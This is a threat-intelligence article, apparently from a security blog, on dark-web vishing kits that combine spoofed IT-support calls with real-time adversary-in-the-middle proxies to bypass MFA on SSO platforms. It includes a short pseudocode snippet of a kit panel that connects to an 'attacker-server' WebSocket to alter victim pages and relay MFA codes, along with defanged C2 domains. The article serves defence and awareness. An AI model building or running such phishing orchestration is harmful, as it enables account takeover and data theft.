
| Threat Type | Social Engineering + Real-Time AiTM Phishing (Vishing-as-a-Service) |
|---|---|
| Severity | High (Effective Bypass of MFA/SSO – Comparable CVSS ~8.2) |
| Affected Systems | SSO Providers (Okta, Microsoft Entra ID, Google Workspace); Non-Phishing-Resistant MFA (Push, SMS, Authenticator Apps) |
| Attack Vector | Remote – Spoofed Voice Calls + Custom Phishing Links (Requires User Interaction) |
| Exploitation Status | Active in the Wild (ShinyHunters / UNC6661 Campaigns Observed Jan 2026) |
| Mitigation Availability | No Direct Patch – Use Phishing-Resistant MFA (FIDO2/Passkeys), Callback Verification, Awareness Training (Ongoing Advisories from Okta/Microsoft) |
| Core Mechanism | Real-Time Session Orchestration + Human-Guided MFA Bypass via Voice Instructions and AiTM Proxy |
| Preview Pane Safety | No – Requires Victim to Click Link and Interact During Call |
In the opening weeks of 2026, a surge in sophisticated voice phishing (vishing) campaigns has spotlighted the dark web’s thriving market for “Vishing-as-a-Service” (VaaS) kits. For background on the initial surge and market trends, see our earlier report: Vishing Kits Surge on Dark Web (Jan 25, 2026).
Vishing-as-a-Service represents an evolution in identity-based attacks, classified as a hybrid social engineering and technical bypass threat. At its core, it’s not a zero-day exploit but a sophisticated abuse of authentication workflows. Attackers leverage dark web-sourced kits to conduct voice phishing, posing as IT support or trusted entities, while simultaneously manipulating phishing sites to capture credentials and MFA responses. This builds directly on the broader surge documented in our January 25 article: Vishing Kits Surge on Dark Web.
The root cause lies in the limitations of non-phishing-resistant MFA methods (e.g., push notifications, SMS codes, or authenticator apps), which rely on user approval without verifying the context. Combined with Adversary-in-the-Middle (AiTM) techniques, these kits intercept sessions in real time, allowing attackers to relay MFA challenges while guiding victims verbally. Affected systems include major SSO providers like Okta, Microsoft Entra ID (formerly Azure AD), and Google Workspace, where compromised credentials grant broad access to cloud resources.
Impact is severe: Once inside, attackers exfiltrate sensitive data (e.g., customer records, IP), leading to extortion or resale on dark web forums. In enterprise contexts, this can cascade to ransomware deployment or supply chain compromises. Attack complexity is moderate—requiring profiling and timing—but success rates are high (up to 40% in targeted campaigns per 2025 reports, projected to rise in 2026). User interaction is mandatory, but the human element makes it insidious, evading automated defenses.
Vishing kits on the dark web have matured from simple scripts in 2025 to full-fledged platforms in 2026. Sold via Telegram channels and forums like BreachForums or XSS.is, they include components like spoofed caller ID tools, AI-generated voice prompts, and real-time phishing panels. Core to these kits is the AiTM framework, often built on open-source tools like EvilProxy or custom variants (e.g., Tycoon 2FA, Mamba, Whisper 2FA, Sneaky 2FA).
These platforms act as reverse proxies, sitting between the victim and legitimate SSO sites. When a user clicks a phishing link (delivered via email or SMS), the kit forwards requests to the real site while capturing responses. Enhancements for vishing include live operator dashboards, where attackers monitor and alter page elements (e.g., displaying fake MFA prompts) during calls.
While kit source code isn’t publicly dissected (dark web exclusivity), analysis from captured samples (e.g., via Mandiant, Okta) reveals JavaScript-heavy client-side logic. For instance, WebSocket connections enable real-time updates:
// Simplified pseudocode from a typical AiTM kit panel
const socket = new WebSocket('ws://attacker-server/control');
socket.onmessage = (event) => {
// Update victim page based on operator input
document.getElementById('mfa-prompt').innerText = event.data.prompt;
// Relay MFA code if provided verbally
if (event.data.type === 'mfa_code') {
submitMFA(event.data.code);
}
};
Server-side (often Node.js or Python Flask), proxies handle cookie theft and session replay. Patches? SSO providers like Okta have issued advisories, but the flaw is architectural—legacy MFA isn’t phishing-proof. 2026 kits incorporate evasion: CAPTCHA solvers, URL obfuscation, and browser fingerprint spoofing to dodge EDR.
Vishing kits rarely stand alone. They chain with credential stuffing (from breaches like RockYou2025) for initial access, or pair with malware droppers post-SSO (e.g., infostealers like RedLine). In ransomware operations, vishing gains the initial foothold, followed by lateral movement via compromised SaaS. Emerging: AI voice cloning (deepfakes) for unprompted calls, bypassing user suspicion.
Active since early January 2026, these campaigns are tracked by Mandiant as UNC6661 (ShinyHunters-linked). Observed patterns include targeted calls to U.S. and EU firms, spoofing internal IT numbers. Victims include Crunchbase (data leak Jan 28), SoundCloud (user credentials exfiltrated), and Betterment (extortion attempts).
IoCs: Anomalous MFA enrollments, outbound connections to kit C2 domains (e.g., okta-help[.]top, microsoft-support[.]live), unusual call logs from +1-XXX numbers.
Timeline: Kits proliferated in dark web markets post-2025 (doubling PhaaS options per Barracuda), with ShinyHunters claiming responsibility on their data leak site (DLS). Real-world impacts include data theft leading to millions in extortion; enterprise risks include IP loss and regulatory fines (GDPR/CCPA violations).
Threat actors: Cybercrime syndicates (ShinyHunters, Scattered Spider affiliates), with suspected state ties in some cases (e.g., Iranian actors per Silent Push). Success stems from human-led operations—operators train via kit tutorials, contributing to a 146% YoY increase in AiTM per Microsoft.
Recommended: Integrate dark web monitoring (e.g., Flare, Hudson Rock) for early kit alerts.
Proactive audits: Test MFA resilience with red-team tools like EvilProxy.
The dark web’s VaaS kits in 2026 highlight a pivotal shift: authentication security now depends as much on human factors as on technology. ShinyHunters’ campaigns demonstrate how real-time orchestration can turn MFA into a liability, demanding a clear move toward phishing-resistant alternatives. Legacy systems invite exploitation; organizations must harden beyond traditional patches, building vigilance and zero-trust principles. As these kits evolve—potentially integrating AI deepfakes—the race is on: detect early, or face the consequences of stolen identities and exfiltrated data. ByteVanguard will continue tracking these threats—stay tuned for updates.
Microsoft Digital Defense Report: AiTM Surges (Referenced in 2026 Analyses)
https://www.microsoft.com/en-us/security/blog/2026/01/21/multistage-aitm-phishing-bec-campaign-abusing-sharepoint
Okta Threat Intelligence: Phishing Kits Adapt to the Script of Callers (Jan 23, 2026)
https://www.okta.com/blog/threat-intelligence/phishing-kits-adapt-to-the-script-of-callers
Mandiant/Google Cloud: ShinyHunters Vishing Campaigns (Jan 30, 2026)
https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft
If you find ByteVanguard useful, you can support the site and help keep the analysis independent.
Support the analysis